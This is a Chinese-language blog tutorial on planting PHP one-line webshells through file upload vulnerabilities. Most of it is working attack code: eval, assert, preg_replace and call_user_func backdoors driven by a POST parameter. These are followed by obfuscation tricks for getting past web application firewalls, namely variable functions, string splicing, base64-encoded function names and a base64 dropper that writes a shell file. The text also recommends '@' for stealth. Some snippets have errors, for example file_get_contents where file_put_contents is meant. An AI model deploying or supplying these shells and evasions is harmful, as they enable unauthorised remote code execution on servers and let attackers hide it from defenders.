PHP一句话木马在文件上传漏洞中的运用

0x01 概述

在很多的渗透测试过程中，安全人员会利用文件上传漏洞上传一句话木马（简称Webshell）到目前Web服务目录继而提权获取系统权限，不论asp、php、jsp、aspx都是如此。

入侵条件

只要攻击者满足三个条件，就能实现成功入侵：

1.木马上传成功，未被waf拦截；

2.知道木马的路径在哪；

3.上传的木马能正常运行。

0x02 PHP一句话木马常用函数

1. eval()   

<?php @eval($_POST['hacker']); ?>    eval函数将接受的字符串当做代码执行

2. assert()

用法和 eval()一样

3. preg_replace()

<?php @preg_replace("/abcd/e",$_POST['hacker'],"abcdefg"); ?>    

preg_replace 函数原本是利用正则表达式来替换符合条件的字符串，但是这个函数有一个功能，可执行命令的功能。

这个函数的第一个参数是正则表达式，按照php的格式，表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”，那么这个函数的第二个参数就会被当做php代码执行。

4. create_function()

<?php
           $newfun = create_function('$hacker', 'echo $hacker;');
           $newfun('woaini');
        ?>
          创建了一个匿名函数，并返回了一个独一无二的函数名

5. call_user_func()

<?php @call_user_func(eval,$_POST['hacker']); ?>    或者

<?php @call_user_func($_POST["fun"],$_POST["para"]); ?>       

//post: fun=evel&para=phpinfo();

函数的第一个参数是被调动的函数，剩下的参数（可有多个参数）是被调用函数的参数

call_user_func_array(): 方法同上，只是第二个参数要是一个数组，作为第一个参数的参数

6.file_put_contents()

<?php
          $test='一句话木马';
          file_get_contents("文件名", $test);
        ?>

此函数生成一个文件，第一个参数是文件名，第二个参数是要写入文件的内容。

0x03 怎么让一句话木马绕过 WAF

 WAF通常会以关键字判断是否为一句话木马，所以要将一句话木马变形使用，从而绕过 waf：

1. php变量函数

<?php
                $a = "assert";
                $a($_POST['hacker']); 
        ?>

使用了变量函数 $a，变量储存了函数名，便可以直接用变量替代函数名。

2. php可变变量

<?php
              $b = "assert";
              $a = 'b';
              $$a($_POST['hacker']);
        ?>

3. str_replace函数

<?php
                $a = str_replace("b", "", "absbsbebrbt");
                $a($_POST['hacker']);
        ?>
        此函数作用是：在第三个参数中查找第一个参数，并替换成第二个参数。这里第二个参数为空字符串，就相当于删除“b”。

4. base64_decode 函数

<?php
                $a = base64_decode("YXNzZXJ0");
                $a($_POST['hacker']);
        ?>

这是base64解密函数，“YXNzZXJ0”是“assert”字符串的base64加密。

当然，也可以这样：

<?php
                @fputs(fopen(base64_decode('dGVzdC5waHA='),w),
                base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydoYWN
                rZXInXSk7Pz4='));
        ?>

"dGVzdC5waHA="base64解码后是“test.php”，

“PD9waHAgQGV2YWwoJF9QT1NUWydoYWNrZXInXSk7Pz4=”解码后就是“<?php @eval($_POST['hacker']);?>”

这个相当于生成一个test.php的文件，并在文件中写入了一句话木马。

5. 使用"."连接字符串

<?php
                $b = "a"."ss";
                $c = "er"."t";
                $a = $b.$c;
                $a($_POST['hacker']);
        ?>

6. parse_str函数

<?php
                $str = "a=assert";
                parse_str($str);          //parse_str("a=assert");
                $a($_POST['hacker']);
        ?>

执行此函数后，将生成一个变量$a，变量$a的值为字符串”assert”。

最后举个例子：

<?php
                function fun(){
                    return $_POST['hacker'];
                }
                @preg_replace("/test/e", fun(), "testtesttest");
        ?>

以上六种技巧每一种单独使用都不能绕过waf，但是与 0x02 中提到的函数混合起来使用，就可以顺利的欺骗waf。

tips：使用一句话木马的时候可以在函数前加”@”符，这个符号让php语句不显示错误信息，增加隐蔽性。

本站文章由渡缘人原创，如若转载请注明原文及出处：
https://www.hygrey.com/php-webshell.html